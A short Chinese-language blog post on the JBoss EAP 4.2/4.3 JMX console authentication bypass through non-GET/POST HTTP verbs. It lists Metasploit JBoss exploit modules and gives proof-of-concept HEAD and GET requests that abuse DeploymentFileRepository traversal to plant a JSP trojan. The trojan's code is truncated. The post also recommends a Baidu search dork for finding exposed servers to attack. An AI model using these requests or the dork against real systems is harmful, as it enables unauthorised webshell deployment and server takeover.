jboss漏洞参考:http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
具体影响:
RedHat JBoss EAP 4.3
RedHat JBoss EAP 4.2
JBoss企业应用平台(EAP)是J2EE应用的中间件平台。 JMX控制台配置仅对使用GET和POST HTTP命令的请求指定了认证要求,远程攻击者可以创建没有指定GET或POST的HTTP请求以admin身份进行操作。其实在 RHSA-2008:0828更新修复了未经认证用户可访问状态servlet的漏洞(CVE-2008-3273);但RHSA-2009:0349中 的bug修复重新引入了这个漏洞。在metasploit中已经看到更新了这个漏洞插件:
msf > search jboss
[*] Searching loaded modules for pattern ‘jboss’…
Exploits
========
Name Rank Description
—- —- ———–
multi/http/jboss_deploymentfilerepository excellent JBoss Java Class DeploymentFileRepository Directory Traversal
multi/http/jboss_maindeployer excellent JBoss JMX Console Deployer Upload and Execute
…………
poc:
HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. HTTP/1.1
用baidu“inurl:jmx-console”,发现用4.2、4.3版本的不少,可惜主要是windows平台为主。
这里还可以延伸一个小技巧,虽然有些jboss没有密码,但不允许远程发布文件,我们可以用以下解决:
GET /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. (木马代码) HTTP/1.1
这也是jboss autopwn里的方法。当然metasploit也实现了这点。
